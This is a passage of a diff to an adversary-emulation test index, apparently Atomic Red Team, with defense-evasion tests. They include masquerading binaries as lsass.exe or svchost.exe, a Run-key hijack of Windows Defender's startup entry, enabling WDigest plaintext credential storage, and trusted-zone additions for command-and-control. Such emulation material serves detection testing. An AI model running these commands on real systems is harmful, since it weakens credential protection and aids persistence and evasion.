/U variant description: 'Executes the Uninstall Method - ' +' supported_platforms: - windows input_arguments: @@ -9308,7 +9391,7 @@ defense-evasion: variant description: 'Executes the Uninstall Method - ' +' supported_platforms: - windows input_arguments: @@ -9375,7 +9458,7 @@ defense-evasion: - name: InstallUtil HelpText method call description: 'Executes the Uninstall Method - ' +' supported_platforms: - windows input_arguments: @@ -9443,7 +9526,7 @@ defense-evasion: description: 'Executes an InstallUtil assembly by renaming InstallUtil.exe and using a nonstandard extension for the assembly. - ' +' supported_platforms: - windows input_arguments: @@ -9560,14 +9643,14 @@ defense-evasion: - name: Launchctl description: 'Utilize launchctl - ' +' supported_platforms: - macos executor: name: sh command: 'launchctl submit -l evil -- /Applications/Calculator.app/Contents/MacOS/Calculator - ' +' T1036: technique: x_mitre_data_sources: @@ -9693,7 +9776,7 @@ defense-evasion: %SystemRoot%\Temp\lsass.exe /B cleanup_command: 'del /Q /F %SystemRoot%\Temp\lsass.exe >nul 2>&1 - ' +' - name: Masquerading as Linux crond process. description: | Copies sh process, renames it as crond, and executes it to masquerade as the cron daemon. @@ -9722,7 +9805,7 @@ defense-evasion: cmd.exe /c %APPDATA%\notepad.exe /B cleanup_command: 'del /Q /F %APPDATA%\notepad.exe >nul 2>&1 - ' +' - name: Masquerading - wscript.exe running as svchost.exe description: | Copies wscript.exe, renames it, and launches it to masquerade as an instance of svchost.exe. @@ -9738,7 +9821,7 @@ defense-evasion: cmd.exe /c %APPDATA%\svchost.exe /B cleanup_command: 'del /Q /F %APPDATA%\svchost.exe >nul 2>&1 - ' +' - name: Masquerading - powershell.exe running as taskhostw.exe description: | Copies powershell.exe, renames it, and launches it to masquerade as an instance of taskhostw.exe. @@ -9754,7 +9837,7 @@ defense-evasion: cmd.exe /K %APPDATA%\taskhostw.exe cleanup_command: 'del /Q /F %APPDATA%\taskhostw.exe >nul 2>&1 - ' +' - name: Masquerading - non-windows exe running as windows exe description: | Copies an exe, renames it as a windows exe, and launches it to masquerade as a real windows exe @@ -9787,12 +9870,12 @@ defense-evasion: Stop-Process -ID $myT1036 cleanup_command: 'Remove-Item #{outputfile} -Force -ErrorAction Ignore - ' +' - name: Masquerading - windows exe running as different windows exe description: 'Copies a windows exe, renames it as another windows exe, and launches it to masquerade as second windows exe - ' +' supported_platforms: - windows input_arguments: @@ -9813,7 +9896,7 @@ defense-evasion: Stop-Process -ID $myT1036 cleanup_command: 'Remove-Item #{outputfile} -Force -ErrorAction Ignore - ' +' - name: Malicious process Masquerading as LSM.exe description: | Detect LSM running from an incorrect directory and an incorrect service account @@ -9914,10 +9997,9 @@ defense-evasion: identifier: T1112 atomic_tests: - name: Modify Registry of Current User Profile - cmd - description: 'Modify the registry of the currently logged in user using reg.exe - cia cmd console - - ' + description: | + Modify the registry of the currently logged in user using reg.exe via cmd console. Upon execution, the message "The operation completed successfully." + will be displayed. Additionally, open Registry Editor to view the new entry in HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced. supported_platforms: - windows executor: @@ -9926,96 +10008,39 @@ defense-evasion: command: 'reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /t REG_DWORD /v HideFileExt /d 1 /f - ' +' cleanup_command: 'reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v HideFileExt /f - ' +' - name: Modify Registry of Local Machine - cmd description: | Modify the Local Machine registry RUN key to change Windows Defender executable that should be ran on startup. This should only be possible when - CMD is ran as Administrative rights. + CMD is ran as Administrative rights. Upon execution, the message "The operation completed successfully." + will be displayed. Additionally, open Registry Editor to view the modified entry in HKCU\Software\Microsoft\Windows\CurrentVersion\Run. supported_platforms: - windows + input_arguments: + new_executable: + description: New executable to run on startup instead of Windows Defender + type: string + default: calc.exe executor: name: command_prompt elevation_required: true command: 'reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run - /t REG_EXPAND_SZ /v SecurityHealth /d {some_other_executable} /f + /t REG_EXPAND_SZ /v SecurityHealth /d #{new_executable} /f - ' +' cleanup_command: 'reg delete HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v SecurityHealth /f - ' - - name: Modify Registry of Another User Profile - description: 'Modify a registry key of each user profile not currently loaded - on the machine using both powershell and cmd line tools. - - ' - supported_platforms: - - windows - executor: - name: powershell - elevation_required: true - command: | - # here is an example of using the same method of reg load, but without the New-PSDrive cmdlet. - # Here we can load all unloaded user hives and do whatever we want in the location below (comments) - $PatternSID = 'S-1-5-21-\d+-\d+\-\d+\-\d+$' - - Write-Verbose -Message 'Gathering Profile List and loading their registry hives' - # Get Username, SID, and location of ntuser.dat for all users - - $ProfileList = @() - $ProfileList = Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\*' | Where-Object { $_.PSChildName -match $PatternSID } | - Select @{ name = "SID"; expression = { $_.PSChildName } }, - @{ name = "UserHive"; expression = { "$($_.ProfileImagePath)\ntuser.dat" } }, - @{ name = "Username"; expression = { $_.ProfileImagePath -replace '^(.*[\\\/])', '' } } - - # Get all user SIDs found in HKEY_USERS (ntuder.dat files that are loaded) - $LoadedHives = Get-ChildItem Registry::HKEY_USERS | ? { $_.PSChildname -match $PatternSID } | Select @{ name = "SID"; expression = { $_.PSChildName } } - - $SIDObject = @() - - foreach ($item in $LoadedHives) - { - $props = @{ - SID = $item.SID - } - - $TempSIDObject = New-Object -TypeName PSCustomObject -Property $props - $SIDObject += $TempSIDObject - } - - # We need to use ($ProfileList | Measure-Object).count instead of just ($ProfileList).count because in PS V2 - # if the count is less than 2 it doesn't work. :) - for ($p = 0; $p -lt ($ProfileList | Measure-Object).count; $p++) - { - for ($l = 0; $l -lt ($SIDObject | Measure-Object).count; $l++) - { - if (($ProfileList[$p].SID) -ne ($SIDObject[$l].SID)) - { - $UnloadedHives += $ProfileList[$p].SID - Write-Verbose -Message "Loading Registry hives for $($ProfileList[$p].SID)" - reg load "HKU\$($ProfileList[$p].SID)" "$($ProfileList[$p].UserHive)" - - Write-Verbose -Message 'Attempting to modify registry keys for each profile' - ##################################################################### - reg add "HKEY_CURRENT_USER\$($ProfileList[$p].SID)\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /t REG_DWORD /v HideFileExt /d 1 /f - } - } - } - - Write-Verbose 'Unloading Registry hives for all users' - # Unload ntuser.dat - ### Garbage collection and closing of ntuser.dat ### - [gc]::Collect() - reg unload "HKU\$($ProfileList[$p].SID)" +' - name: Modify registry to store logon credentials - description: 'Sets registry key that will tell windows to store plaintext passwords - (making the system vulnerable to clear text / cleartext password dumping) - - ' + description: | + Sets registry key that will tell windows to store plaintext passwords (making the system vulnerable to clear text / cleartext password dumping). + Upon execution, the message "The operation completed successfully." will be displayed. + Additionally, open Registry Editor to view the modified entry in HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest. supported_platforms: - windows executor: @@ -10024,68 +10049,42 @@ defense-evasion: command: 'reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f - ' +' cleanup_command: 'reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 0 /f - ' - - name: Modify registry to store PowerShell code - description: 'Sets Windows Registry key containing base64-encoded PowerShell - code. - - ' - supported_platforms: - - windows - input_arguments: - powershell_command: - description: PowerShell command to encode - type: String - default: Write-Host "Hey, Atomic!" - registry_key_storage: - description: Windows Registry Key to store code - type: String - default: HKCU:Software\Microsoft\Windows\CurrentVersion - registry_entry_storage: - description: Windows Registry entry to store code under key - type: String - default: Debug - executor: - name: powershell - elevation_required: false - command: | - $OriginalCommand = '#{powershell_command}' - $Bytes = [System.Text.Encoding]::Unicode.GetBytes($OriginalCommand) - $EncodedCommand =[Convert]::ToBase64String($Bytes) - $EncodedCommand - Set-ItemProperty -Force -Path #{registry_key_storage} -Name #{registry_entry_storage} -Value $EncodedCommand - cleanup_command: 'Remove-ItemProperty -Force -Path #{registry_key_storage} - -Name #{registry_entry_storage} -ErrorAction Ignore - - ' +' - name: Add domain to Trusted sites Zone description: | - Attackers may add a domain to the trusted site zone to bypass defenses. Doing this enables attacks such as c2 over office365 as described here: + Attackers may add a domain to the trusted site zone to bypass defenses. Doing this enables attacks such as c2 over office365. + Upon execution, details of the new registry entries will be displayed. + Additionally, open Registry Editor to view the modified entry in HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\. + https://www.blackhat.com/docs/us-17/wednesday/us-17-Dods-Infecting-The-Enterprise-Abusing-Office365-Powershell-For-Covert-C2.pdf supported_platforms: - windows + input_arguments: + bad_domain: + description: Domain to add to trusted site zone + type: String + default: bad-domain.com executor: name: powershell elevation_required: false command: | - $key= "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\bad-domain.com\" + $key= "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\#{bad_domain}\" $name ="bad-subdomain" new-item $key -Name $name -Force new-itemproperty $key$name -Name https -Value 2 -Type DWORD; new-itemproperty $key$name -Name http -Value 2 -Type DWORD; new-itemproperty $key$name -Name * -Value 2 -Type DWORD; cleanup_command: | - $key = "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\bad-domain.com\" + $key = "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\#{bad_domain}\" Remove-item $key -Recurse -ErrorAction Ignore - name: Javascript in registry - description: 'Upon execution, a javascript block will be placed in the registry - for persistence - - ' + description: | + Upon execution, a javascript block will be placed in the registry for persistence. + Additionally, open Registry Editor to view the modified entry in HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings. supported_platforms: - windows executor: @@ -10094,11 +10093,11 @@ defense-evasion: command: 'New-ItemProperty "HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings" -Name T1112 -Value "